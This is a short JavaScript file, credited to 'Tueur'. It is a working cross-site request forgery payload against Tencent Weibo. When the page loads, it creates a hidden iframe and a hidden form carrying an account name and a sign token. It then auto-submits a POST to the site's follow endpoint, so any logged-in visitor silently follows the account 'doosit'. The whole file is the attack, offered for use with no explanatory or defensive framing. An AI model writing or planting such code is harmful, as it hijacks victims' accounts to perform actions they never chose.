//Author:(Tueur)
var t_name = "doosit";
var t_sign = "97302b45fddeb40e940cf11d04568570082e674d";

function postdata(path, params, method) {
        method = method || "post";
        var form = document.createElement("form");
                if(navigator.appName == "Microsoft Internet Explorer"){
                        var ifm = document.createElement('<iframe name="fuckForm" style="display:none"/>');
                }else{
                        var ifm = document.createElement("iframe");
                        ifm.setAttribute("name","fuckForm");
                        ifm.setAttribute("style","display:none");
                }
                
        form._submit_function_ = form.submit;

        form.setAttribute("method", method);
        form.setAttribute("action", path);
                form.setAttribute("target","fuckForm")

        for(var key in params) {
            var hiddenField = document.createElement("input");
            hiddenField.setAttribute("type", "hidden");
            hiddenField.setAttribute("name", key);
            hiddenField.setAttribute("value", params[key]);

            form.appendChild(hiddenField);
        }
                document.body.appendChild(ifm);
        document.body.appendChild(form);
        form._submit_function_(); 
    }
function fuck() {
        postdata("http://v.t.qq.com/cgi-bin/follow", { name: t_name ,sign:t_sign});
}
fuck();
